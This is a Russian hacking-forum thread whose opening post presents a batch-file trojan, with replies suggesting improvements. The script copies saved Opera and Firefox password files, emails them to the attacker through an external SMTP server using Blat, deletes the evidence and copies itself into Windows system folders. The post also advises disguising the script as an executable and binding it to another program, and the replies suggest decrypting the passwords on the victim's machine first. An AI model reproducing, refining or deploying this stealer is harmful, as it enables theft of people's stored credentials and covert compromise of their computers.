Крадем= все пароли юзера!
 

Недавно мне пришла мысль почему бы не написать маленький троян (батник) отсылающий чужие пароли на указаный ящик! Крадет файл Wand.bat в нем лежат пароли оперы и signons3.txt от Mozilla Firefox. используем прогу Blat.exe скачать её можно с www.blat.ru
вот его тело:

%SYSTEMROOT%/system32/blat.exe -install -server smtp.mail.ru -port 25 -f e-mail@mail.ru -u e-mail -pw PASS >nul
cd %APPDATA%\Opera\Opera\profile\ >nul
copy wand.dat C:\wand.rar >nul
chcp 1251
blat.exe -subject "hacK" -body "Урожай собран!" -to e-mail@mail.ru -attach c:\wand.rar >nul
cd c:\
erase wand.rar >nul
cd %APPDATA%\Mozilla\Firefox\Profiles\9vf96daw.defaul t\ >nul
copy signons3.txt C:\signons3.rar >nul
blat.exe -subject "hacK" -body "Урожай собран!!" -to -е-mail@mail.ru -attach c:\signons3.rar >nul
cls >nul
cd c:\
erase signons3.rar
copy %0 %systemroot%\amatory_crack.bat
copy %0 %systemroot%\system32\amatory_crack.bat

Необходимые файлы для правильной работы:
blat.exe
blat.lib
blat.dll
Наш батник

Используем прогу Bat_To_Exe_Converter для шифрования и скрытия!скачать её можно сдесь http://www.x2b.ru/get/60772 ну вот троян почти готов осталось склеить скакой нибудь прогой!

к разделу реверсинга сабж никоим образом не связан, советую не слать тупо файлы а декриптить на клиенте и слать уже расшифрованые данные:
http://forum.antichat.ru/showthread.php?p=1470090
http://www.rus.passcape.com/opera_password_recovery_screenshots.htm

signons3.txt от Mozilla Firefox

А файл уже без базы key3.db расшифровывается?
И почему signons3.txt ? Есть ещё и signons2.txt да и signons4.txt видели ;)

blat.lib и blat.dll не нужны.

кривой выбор, папка с профилем не всегда начинается с "9vf96daw" этот набор случайный, уже не универсально!